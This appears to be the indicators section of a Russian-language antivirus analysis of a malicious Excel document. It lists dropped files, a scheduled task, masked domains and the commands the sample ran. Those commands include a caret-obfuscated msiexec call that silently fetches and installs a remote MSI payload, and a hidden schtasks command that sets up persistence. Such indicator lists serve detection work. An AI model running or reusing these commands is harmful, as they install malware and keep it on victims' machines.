Техническая информация
- <SYSTEM32>\tasks\updates\ybwpenoffxipo
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://go###izm.com/wp-content/themes/busify/tpt/65021779.msi /qn
- msi92fe.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{10c193e6-a578-49ce-9520-3bef1a015cca}.tmp
- %APPDATA%\ybwpenoffxipo.exe
- %TEMP%\tmp9d1c.tmp
- %TEMP%\b16c4ebedc\log.txt
- %APPDATA%\ybwpenoffxipo.exe
- %TEMP%\tmp9d1c.tmp
- http://go###izm.com/wp-content/themes/busify/tpt/65021779.msi
- http://ap#.#pify.org/
- DNS ASK go###izm.com
- DNS ASK ap#.#pify.org
- '%WINDIR%\installer\msi92fe.tmp'
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://go###izm.com/wp-content/themes/busify/tpt/65021779.msi /qn' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\yBWpenoffxiPO" /XML "%TEMP%\tmp9D1C.tmp"' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\msiexec.exe' /i http://go###izm.com/wp-content/themes/busify/tpt/65021779.msi /qn
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\yBWpenoffxiPO" /XML "%TEMP%\tmp9D1C.tmp"